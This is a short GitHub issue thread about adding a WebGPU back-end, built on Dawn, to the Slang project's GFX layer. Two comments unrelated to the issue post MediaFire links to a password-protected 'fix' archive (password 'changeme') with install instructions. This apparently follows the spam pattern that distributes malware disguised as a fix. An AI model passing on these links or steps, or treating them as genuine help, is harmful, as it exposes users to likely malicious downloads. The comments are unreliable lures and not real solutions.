### ISSUE TITLE
WGSL: Add WebGPU support to GFX, so that it can run in CI

### ISSUE THREAD

**Issue by aleino-nv** [shader-slang/slang#4942]
Use Dawn (webgpu_dawn.dll) to create a WebGPU back-end for GFX

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aleino-nv** [comment]
I think this is just #5052
